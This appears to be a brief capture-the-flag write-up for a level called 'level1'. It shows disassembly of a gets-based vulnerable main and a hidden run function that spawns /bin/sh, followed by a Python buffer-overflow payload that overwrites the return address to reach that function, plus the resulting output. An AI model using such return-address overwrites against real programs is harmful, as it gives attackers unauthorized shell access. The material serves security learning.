* MAIN *
push    ebp
mov     ebp, esp
and     esp, 0FFFFFFF0h
sub     esp, 50h
lea     eax, [esp+10h]
mov     [esp], eax
call    _gets
leave
retn

* RUN *
push    ebp
mov     ebp, esp
sub     esp, 18h
mov     eax, ds:stdout@@GLIBC_2_0
mov     edx, eax
mov     eax, offset aGoodWaitWhat ; "Good... Wait what?\n"
mov     [esp+0Ch], edx
mov     dword ptr [esp+8], 13h
mov     dword ptr [esp+4], 1
mov     [esp], eax
call    _fwrite
mov     dword ptr [esp], offset aBinSh ; "/bin/sh"
call    _system
leave
retn
; } // starts at 8048444
run endp

* Calculate offset *

payload : python -c 'print "A" * 74 + "\x44\x84\x04\x08"'

(python -c 'print "A" * 76 + "\x44\x84\x04\x08"'; cat -) | ./level1
Good... Wait what?

****flag****
